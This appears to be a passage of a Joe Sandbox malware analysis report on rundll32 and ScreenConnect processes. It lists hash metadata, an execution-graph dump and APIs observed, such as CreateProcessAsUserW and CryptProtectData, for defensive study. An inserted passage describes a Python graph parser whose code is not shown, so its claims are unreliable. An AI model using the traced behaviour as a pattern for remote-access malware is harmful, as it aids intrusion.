                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bbbcc19e239d6598c93ac5c70633f2069f7685739c890fbf5cc88c2478e80cb9
                                                                                                                                                                      • Instruction ID: e2eba50b5c187763c6976c5d6acd2aa1c419d0414ceba6407ee204e2f2d9ace3
                                                                                                                                                                      • Opcode Fuzzy Hash: bbbcc19e239d6598c93ac5c70633f2069f7685739c890fbf5cc88c2478e80cb9
                                                                                                                                                                      • Instruction Fuzzy Hash: 7921B435A00209AFCB04DFA4D859ABDBFB6EF8C710F158019E50AA7360DF705886DB90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 12062d39721c6befb48dd2d1f826bfdae3bcbf2c87c94d2f39102c8ee0266291
                                                                                                                                                                      • Instruction ID: 851aef4f2ae0bac9c7ae0990caf063dce7a03ce9ae1edc75a4b05b8608df452f
                                                                                                                                                                      • Opcode Fuzzy Hash: 12062d39721c6befb48dd2d1f826bfdae3bcbf2c87c94d2f39102c8ee0266291
                                                                                                                                                                      • Instruction Fuzzy Hash: B701D2B3F001298BCB20EA6D98006ABBBE5EF8C722F11453AD509E7344FA349901C7E1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 59219ec540434b52ec3b4403661b15825f48687bf972b1ffc62c34304219a0b2
                                                                                                                                                                      • Instruction ID: 154aa06bdd858369da77a41b09a83ef4124258a61b6681166d3fe1fa97f4aa53
                                                                                                                                                                      • Opcode Fuzzy Hash: 59219ec540434b52ec3b4403661b15825f48687bf972b1ffc62c34304219a0b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 802115B1D042498FDB10DFAAC444AEEFBB0FF59324F10852ED459A7250C7756945CFA1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8322f003152724ffcf76d5575bb9621ded06f099a026563a46f73f0cee72cc60
                                                                                                                                                                      • Instruction ID: cb5525dd4c7dedd65299b353466b7ab903f2ff7849bd9265d8ad3f6a20a9ef9b
                                                                                                                                                                      • Opcode Fuzzy Hash: 8322f003152724ffcf76d5575bb9621ded06f099a026563a46f73f0cee72cc60
                                                                                                                                                                      • Instruction Fuzzy Hash: 6201C836B001188BDF149BA8D8242EEBBF6FB8C315F04417EC405F7254EB35A946C7A5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f27612c32c3054bbcfc0071238e118dcecabeb27d9da518b373ca3c1844c2da2
                                                                                                                                                                      • Instruction ID: d29cd9ac10a8cc65c1063a299e3cba38267c421aa6ab0a5bebbe807a61077dac
                                                                                                                                                                      • Opcode Fuzzy Hash: f27612c32c3054bbcfc0071238e118dcecabeb27d9da518b373ca3c1844c2da2
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E01F571B082585FC755FB7C982049EBF76DF96301B2580FAD508DB392DA319D02C7AA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fd13d33457a2c2bda7aba403fff24e882f003965b03b0df516986f0f08809d90
                                                                                                                                                                      • Instruction ID: b5e1aa8c9bfb1353722d2b8bfcc54f36343fa03e3a99ced356898b71ec48ece8
                                                                                                                                                                      • Opcode Fuzzy Hash: fd13d33457a2c2bda7aba403fff24e882f003965b03b0df516986f0f08809d90
                                                                                                                                                                      • Instruction Fuzzy Hash: CC01717A3002109B8744EA6DF89086EB7AAEBD8260354C03BF509CB351DE72EC0297A4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e8bdfb7ab476e18bee1d9bffe675765e7ee596bc66c1bb8ece6834ac6499843c
                                                                                                                                                                      • Instruction ID: 05cf0758bf05314774cb032495ea990fecfc139b1e83e257e2e76d24ea4b29a7
                                                                                                                                                                      • Opcode Fuzzy Hash: e8bdfb7ab476e18bee1d9bffe675765e7ee596bc66c1bb8ece6834ac6499843c
                                                                                                                                                                      • Instruction Fuzzy Hash: 3711F2B1D042498FDB10DFAAC484AEEFBF4FF88324F10842AD459A7250CB75A945CFA5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1834487df577c505560cddef124280e2db6d1d145cf34ae8b8746ee99e823488
                                                                                                                                                                      • Instruction ID: 2d5eed4b3772fab25d9d85193af7b2b453a6e5a5152056fefd5a449c54d00a17
                                                                                                                                                                      • Opcode Fuzzy Hash: 1834487df577c505560cddef124280e2db6d1d145cf34ae8b8746ee99e823488
                                                                                                                                                                      • Instruction Fuzzy Hash: 7301A1307042048BDB18AB69C4187AFBBE6AFC9704F24856DD406AB390EE755D068B94
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5ab7a353505d827f07f65768f5975e25bc90df3cfd901da176d1fb810b938688
                                                                                                                                                                      • Instruction ID: 6eec7a6c798ba5044afbd8fcfbd855abd5f2a927e947273d6f1749e232c771fd
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ab7a353505d827f07f65768f5975e25bc90df3cfd901da176d1fb810b938688
                                                                                                                                                                      • Instruction Fuzzy Hash: EE1154356006099FCB04DFA4D858AB97BBAEF8C710F154019E50AE7360DF759885DB90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 146c587b18f768904d89a5854ce27bc671e0b38b8dbc0ac0ae31964f0044f730
                                                                                                                                                                      • Instruction ID: f8bf9d930e2ac1740f7f7d51cb8bd6c61ebec19e16cd6f34ed12cd322c420942
                                                                                                                                                                      • Opcode Fuzzy Hash: 146c587b18f768904d89a5854ce27bc671e0b38b8dbc0ac0ae31964f0044f730
                                                                                                                                                                      • Instruction Fuzzy Hash: 27D02B722182546FC309E750E4474657FB8FF5B21130580AFE801CB262DD311C46C7C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4c00afc135752cc09d0bfa136260cde305a1c9aec2ed68b2cdca8e76fc885202
                                                                                                                                                                      • Instruction ID: 94475e1182bf6f4bcdb4387a9b2a0c73f7b1a50a03e1f40072b129c60087b693
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c00afc135752cc09d0bfa136260cde305a1c9aec2ed68b2cdca8e76fc885202
                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE04FB1E09288EFCB01DFA4EE5155CBFB1DB06204B0040E9E808DB253FA315F059792
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: db9975b04111447421ff57009e1a67ae377c78bfc79b78589170f2321b64c70d
                                                                                                                                                                      • Instruction ID: 08fc9a2826913850022c72df2e6394420ac0c8140dcbdf4c75674e1cfd0ce4ec
                                                                                                                                                                      • Opcode Fuzzy Hash: db9975b04111447421ff57009e1a67ae377c78bfc79b78589170f2321b64c70d
                                                                                                                                                                      • Instruction Fuzzy Hash: B1D05E617192500F8B69A92C6C54490AF918FEB32532A81EFD505C7362E552AC83D394
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 309c9d6ce73c7f6ff60437b6a6c99507e5054b81c4d97cecd56bbf779539e92d
                                                                                                                                                                      • Instruction ID: d00f10a29a9d56c1d79234943e6a358f91877e75caa02c1d0b35c94af54726fb
                                                                                                                                                                      • Opcode Fuzzy Hash: 309c9d6ce73c7f6ff60437b6a6c99507e5054b81c4d97cecd56bbf779539e92d
                                                                                                                                                                      • Instruction Fuzzy Hash: AED0A73231111C6B47047658D88687ABB99EB99360311843BFA0283224ED706C459399
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c0fc7251fe9e3b79487e12f08b2620fe4126501fa0e64574d053745ad8b3a6cc
                                                                                                                                                                      • Instruction ID: 0d16c2b497b3476994ee9b1bd4322c01b9d26217f268d811a8fc4a0f67ef9b74
                                                                                                                                                                      • Opcode Fuzzy Hash: c0fc7251fe9e3b79487e12f08b2620fe4126501fa0e64574d053745ad8b3a6cc
                                                                                                                                                                      • Instruction Fuzzy Hash: 57D01230901208EF8B44DFACD90155DB7B9DB45205B5081A8A408E7310EF716F049790
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c64e8064a716cb7fe59f15c595af62a0efe71c467a17812d959eb8b750ddaa33
                                                                                                                                                                      • Instruction ID: fef8772aa8f8e0d3cc2909a60e279e08dfd8cf70ff3a7be292994268298f1ba6
                                                                                                                                                                      • Opcode Fuzzy Hash: c64e8064a716cb7fe59f15c595af62a0efe71c467a17812d959eb8b750ddaa33
                                                                                                                                                                      • Instruction Fuzzy Hash: EED05E70A0120CEFCB40DFA8EA0255DBBF9EB45204B5085A9E808E7342EA31AF049B90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ffe43c3daff476832c4c5f1da8b819869155531255ff31b3958730f855f2e112
                                                                                                                                                                      • Instruction ID: fd84801435aaed9feea012e34c8ed7b66a56887f37372404e7e072b836f48715
                                                                                                                                                                      • Opcode Fuzzy Hash: ffe43c3daff476832c4c5f1da8b819869155531255ff31b3958730f855f2e112
                                                                                                                                                                      • Instruction Fuzzy Hash: 3AC08CB142A380AFC7024B508D468A2BF34FFA370238183EBE081C6073D3361822DB36

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:12.2%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:6.9%
                                                                                                                                                                      Total number of Nodes:131
                                                                                                                                                                      Total number of Limit Nodes:13
                                                                                                                                                                      execution_graph 41390 5220f33 41394 52210e8 41390->41394 41398 52210d9 41390->41398 41391 5220f4b 41395 522110b 41394->41395 41402 5221471 41395->41402 41399 52210e8 41398->41399 41401 5221471 2 API calls 41399->41401 41400 522116a 41401->41400 41406 52214e0 41402->41406 41409 52214d5 41402->41409 41407 5221534 ConnectNamedPipe 41406->41407 41408 5221570 41407->41408 41410 5221534 ConnectNamedPipe 41409->41410 41411 5221570 41410->41411 41411->41411 41416 3991738 41417 399177a 41416->41417 41418 3991780 CryptProtectData 41416->41418 41417->41418 41419 39917c3 41418->41419 41341 522f6a0 41343 522f6fe CreateFileA 41341->41343 41344 522f7d5 41343->41344 41412 5222930 41413 5222983 CreateProcessAsUserW 41412->41413 41415 5222a14 41413->41415 41420 5220040 41421 5220071 41420->41421 41422 52200c7 41421->41422 41426 5220c39 41421->41426 41432 5224d11 41422->41432 41423 5220a4e 41423->41423 41427 5220c6c 41426->41427 41429 5220cb4 41427->41429 41440 5215fd9 41427->41440 41448 5215fe8 41427->41448 41428 5220d44 41429->41422 41433 5224d3e 41432->41433 41435 5224d57 41433->41435 41491 5224e70 41433->41491 41495 5224e80 41433->41495 41434 5224d80 41438 5224e70 WaitNamedPipeW 41434->41438 41439 5224e80 WaitNamedPipeW 41434->41439 41435->41423 41438->41435 41439->41435 41441 5215fe8 41440->41441 41442 521600c 41441->41442 41456 5216157 41441->41456 41463 5216168 41441->41463 41443 5216015 41442->41443 41444 5216157 4 API calls 41442->41444 41445 5216168 4 API calls 41442->41445 41443->41428 41444->41442 41445->41442 41449 521601c 41448->41449 41450 521600c 41448->41450 41452 5216157 4 API calls 41449->41452 41453 5216168 4 API calls 41449->41453 41451 5216015 41450->41451 41454 5216157 4 API calls 41450->41454 41455 5216168 4 API calls 41450->41455 41451->41428 41452->41450 41453->41450 41454->41450 41455->41450 
41457 521619d 41456->41457 41458 521618d 41456->41458 41470 52162e8 41457->41470 41477 52162d8 41457->41477 41460 5216196 41458->41460 41484 5215588 41458->41484 41460->41442 41464 521618d 41463->41464 41466 521619d 41463->41466 41465 5216196 41464->41465 41467 5215588 ProcessIdToSessionId 41464->41467 41465->41442 41468 52162e8 2 API calls 41466->41468 41469 52162d8 2 API calls 41466->41469 41467->41464 41468->41464 41469->41464 41473 5216312 41470->41473 41476 52162ff 41470->41476 41471 5216308 41471->41458 41472 521647a K32EnumProcesses 41475 52164b2 41472->41475 41473->41476 41487 5215594 41473->41487 41475->41458 41476->41471 41476->41472 41478 52162e8 41477->41478 41479 52162ff 41478->41479 41482 5215594 K32EnumProcesses 41478->41482 41480 5216308 41479->41480 41481 521647a K32EnumProcesses 41479->41481 41480->41458 41483 52164b2 41481->41483 41482->41478 41483->41458 41485 5216520 ProcessIdToSessionId 41484->41485 41486 5216593 41485->41486 41486->41458 41488 5216428 K32EnumProcesses 41487->41488 41490 52164b2 41488->41490 41490->41473 41494 5224e80 41491->41494 41493 5224ec4 41493->41434 41494->41493 41499 522387c 41494->41499 41496 5224e8d 41495->41496 41497 522387c WaitNamedPipeW 41496->41497 41498 5224ec4 41496->41498 41497->41496 41498->41434 41500 5224ee8 WaitNamedPipeW 41499->41500 41502 5224f64 41500->41502 41502->41494 41345 b31238 41346 b31249 41345->41346 41352 b30e61 41346->41352 41358 b30e69 41346->41358 41364 b30e24 41346->41364 41370 b30e65 41346->41370 41347 b31282 41354 b30e4e 41352->41354 41353 b30e9e 41354->41353 41376 b336b0 41354->41376 41380 b336a0 41354->41380 41355 b3133b 41355->41347 41360 b30e4e 41358->41360 41359 b30e9e 41360->41359 41362 b336b0 RtlGetVersion 41360->41362 41363 b336a0 RtlGetVersion 41360->41363 41361 b3133b 41361->41347 41362->41361 41363->41361 41365 b30e2d 41364->41365 41366 b30d65 41365->41366 41368 b336b0 RtlGetVersion 41365->41368 41369 b336a0 RtlGetVersion 41365->41369 41367 b3133b 41367->41347 41368->41367 
41369->41367 41372 b30e4e 41370->41372 41371 b30e9e 41372->41371 41374 b336b0 RtlGetVersion 41372->41374 41375 b336a0 RtlGetVersion 41372->41375 41373 b3133b 41373->41347 41374->41373 41375->41373 41377 b336c6 41376->41377 41385 b34c62 41377->41385 41378 b336cc 41378->41355 41381 b333d9 41380->41381 41381->41355 41381->41380 41383 b3339d 41381->41383 41384 b34c62 RtlGetVersion 41381->41384 41382 b336cc 41382->41355 41384->41382 41386 b34c90 41385->41386 41387 b34cc6 41386->41387 41388 b34d1d RtlGetVersion 41386->41388 41387->41378 41389 b34dda 41388->41389 41389->41378
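Added example, not part of the Joe Sandbox report: a small Python parser for the execution_graph dump above, run on a constructed subset copied verbatim from it (the ConnectNamedPipe, CryptProtectData, CreateFileA and CreateProcessAsUserW portion of the process 7 graph). It recovers node addresses, edges and API labels, then lists, for every entry block (a node with no incoming edge), the APIs reachable from it, so the graph can be read without the interactive widget. The token heuristics (5-digit node ids, 6-8 hex-digit block addresses, `id->id` edges, free text after a node as its label) and the function names are my assumptions about the dump format, not a documented Joe Sandbox schema; the control_flow_graph lines use a different format and are not covered.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: the opening portion of the execution_graph dump above,
# copied verbatim from this report (subset of the process 7 ScreenConnect graph).
SAMPLE = (
    "execution_graph 41390 5220f33 41394 52210e8 41390->41394 41398 52210d9 "
    "41390->41398 41391 5220f4b 41395 522110b 41394->41395 41402 5221471 "
    "41395->41402 41399 52210e8 41398->41399 41401 5221471 2 API calls "
    "41399->41401 41400 522116a 41401->41400 41406 52214e0 41402->41406 "
    "41409 52214d5 41402->41409 41407 5221534 ConnectNamedPipe 41406->41407 "
    "41408 5221570 41407->41408 41410 5221534 ConnectNamedPipe 41409->41410 "
    "41411 5221570 41410->41411 41411->41411 41416 3991738 41417 399177a "
    "41416->41417 41418 3991780 CryptProtectData 41416->41418 41417->41418 "
    "41419 39917c3 41418->41419 41341 522f6a0 41343 522f6fe CreateFileA "
    "41341->41343 41344 522f7d5 41343->41344 41412 5222930 "
    "41413 5222983 CreateProcessAsUserW 41412->41413 41415 5222a14 41413->41415"
)

# Assumed token shapes (derived from the dump, not from any Joe Sandbox spec).
NODE_ID = re.compile(r"^\d{5}$")                  # graph node id, e.g. 41390
ADDR = re.compile(r"^[0-9a-f]{6,8}$")             # virtual address of the block
EDGE = re.compile(r"^(\d{5})->(\d{5})$")          # control transfer src->dst
API_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9]*$")  # a real API label, e.g. CreateProcessAsUserW


def _starts_node(tokens, i):
    """True when tokens[i] tokens[i+1] look like 'id addr'."""
    return (NODE_ID.match(tokens[i]) is not None
            and i + 1 < len(tokens)
            and ADDR.match(tokens[i + 1]) is not None)


def parse_graph(text):
    """Return ({node_id: (addr, label)}, {src_id: [dst_id, ...]}).

    A node is 'id addr' followed by free text up to the next node or edge;
    that text is the label ('ConnectNamedPipe', or a collapsed '2 API calls').
    """
    tokens = text.split()
    nodes, edges = {}, defaultdict(list)
    i = 0
    while i < len(tokens):
        m = EDGE.match(tokens[i])
        if m:
            edges[m.group(1)].append(m.group(2))
            i += 1
            continue
        if _starts_node(tokens, i):
            node_id, addr = tokens[i], tokens[i + 1]
            i += 2
            label = []
            while i < len(tokens) and not EDGE.match(tokens[i]) and not _starts_node(tokens, i):
                label.append(tokens[i])
                i += 1
            nodes[node_id] = (addr, " ".join(label))
            continue
        i += 1  # the 'execution_graph' header or any stray token
    return nodes, dict(edges)


def roots(nodes, edges):
    """Nodes with no incoming edge: the entry blocks the sandbox observed."""
    targets = {dst for dsts in edges.values() for dst in dsts}
    return [n for n in nodes if n not in targets]


def apis_reachable(nodes, edges, start):
    """Depth-first walk from `start` (cycle-safe); sorted unique (addr, api) pairs."""
    seen, stack, found = set(), [start], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        addr, label = nodes.get(n, ("?", ""))   # edges may point at undeclared nodes
        if API_NAME.match(label):
            found.add((addr, label))
        stack.extend(edges.get(n, []))
    return sorted(found)


def api_chains(text):
    """Map each entry block address to the APIs reachable from it."""
    nodes, edges = parse_graph(text)
    return {nodes[r][0]: apis_reachable(nodes, edges, r) for r in roots(nodes, edges)}


def api_histogram(text):
    """How many graph nodes carry each API label (a repeated address counts twice)."""
    nodes, _ = parse_graph(text)
    return Counter(label for _, label in nodes.values() if API_NAME.match(label))


if __name__ == "__main__":
    for entry, apis in api_chains(SAMPLE).items():
        print(entry, "->", ", ".join(f"{a}:{n}" for a, n in apis) or "(no API reached)")
```

On the sample this yields one API per entry block: 5220f33 reaches ConnectNamedPipe at 5221534 (via two distinct nodes, 41407 and 41410, which is why the histogram counts it twice), 3991738 reaches CryptProtectData, 522f6a0 reaches CreateFileA, 5222930 reaches CreateProcessAsUserW, and the isolated node 5220f4b reaches nothing. Nodes 41401 and 41402 share address 5221471; the "2 API calls" text on 41401 is a collapsed-subtree summary that the parser keeps as a label but does not treat as an API name. To analyse the whole dump, paste the full execution_graph text into SAMPLE.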

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 130 b34c62-b34cb3 135 b34d02-b34d08 130->135 136 b34cb5-b34cc4 call b34848 130->136 139 b34cc6-b34ccb 136->139 140 b34d09-b34dd8 RtlGetVersion 136->140 152 b34cce call b352f8 139->152 153 b34cce call b352e8 139->153 145 b34de1-b34e24 140->145 146 b34dda-b34de0 140->146 141 b34cd4 141->135 150 b34e26 145->150 151 b34e2b-b34e32 145->151 146->145 150->151 152->141 153->141
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlGetVersion.NTDLL(0000009C), ref: 00B34DBE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3574769399.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_b30000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Version
                                                                                                                                                                      • String ID: `Q^q$`Q^q
                                                                                                                                                                      • API String ID: 1889659487-4048626156
                                                                                                                                                                      • Opcode ID: 87182859f5cd84ab44af8454cad62cf53085b0fdd267976faa5ae59e3fb744ab
                                                                                                                                                                      • Instruction ID: f5f23dba3d152bf807e2309d29cffcfa7813497266557f35598c2e648b4ed912
                                                                                                                                                                      • Opcode Fuzzy Hash: 87182859f5cd84ab44af8454cad62cf53085b0fdd267976faa5ae59e3fb744ab
                                                                                                                                                                      • Instruction Fuzzy Hash: 0341BF71E003599FDB20DF68C848BADBBB5FB45310F1085E9D5499B280DB745E4ACF92

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
control_flow_graph 524 5222930-5222981 525 5222983-5222989 524->525 526 522298c-5222990 524->526 525->526 527 5222992-5222995 526->527 528 5222998-52229ad 526->528 527->528 529 52229bb-5222a12 CreateProcessAsUserW 528->529 530 52229af-52229b8 528->530 531 5222a14-5222a1a 529->531 532 5222a1b-5222a43 529->532 530->529 531->532
APIs
• CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 052229FF
Memory Dump Source
• Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: aefdc15c69ab550f503a2ce0e1393b5473ecced67d6461363b9325092b1599ed
• Instruction ID: 6b5d4c6efc52a47cecec681c5697ce9dfb1767978854458f25c13346ab20d0b9
• Opcode Fuzzy Hash: aefdc15c69ab550f503a2ce0e1393b5473ecced67d6461363b9325092b1599ed
• Instruction Fuzzy Hash: B541357690021AEFCF10CFA9C884ADEBBF1FF48310F14842AE958A7250D735A955CF90
APIs
• CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 039917AE
Memory Dump Source
• Source File: 00000007.00000002.3593478696.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
Similarity
• API ID: CryptDataProtect
• String ID:
• API String ID: 3091777813-0
• Opcode ID: b79e3982a3ced31369e497477a81969b93c0bd3e0d48d5775a70b6c7f42e0aea
• Instruction ID: d3aa157166d95765dafc822d63ba48fe13d89ce0ef2b2d77b5c0a2a6599ab697
• Opcode Fuzzy Hash: b79e3982a3ced31369e497477a81969b93c0bd3e0d48d5775a70b6c7f42e0aea
• Instruction Fuzzy Hash: F02145B680024ADFDF10CF9AC844ADEBBF5FF88350F14851AE958A7210D339A552CFA0
APIs
• CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 039917AE
Memory Dump Source
• Source File: 00000007.00000002.3593478696.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
Similarity
• API ID: CryptDataProtect
• String ID:
• API String ID: 3091777813-0
• Opcode ID: 3eb0b0ee3c54f75add11968ac3e5ccd8839b58f6ea3ddd314d8334061db995b2
• Instruction ID: d8f67fad18ada47c8c2017838254bcdd5a5285f249e95be7542673510ae9f449
• Opcode Fuzzy Hash: 3eb0b0ee3c54f75add11968ac3e5ccd8839b58f6ea3ddd314d8334061db995b2
• Instruction Fuzzy Hash: BE2104B680024A9FDF10CF9AC844ADEBBF5FB88350F14842AE959A7210D739A555CFA1
APIs
• CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0521300D
Memory Dump Source
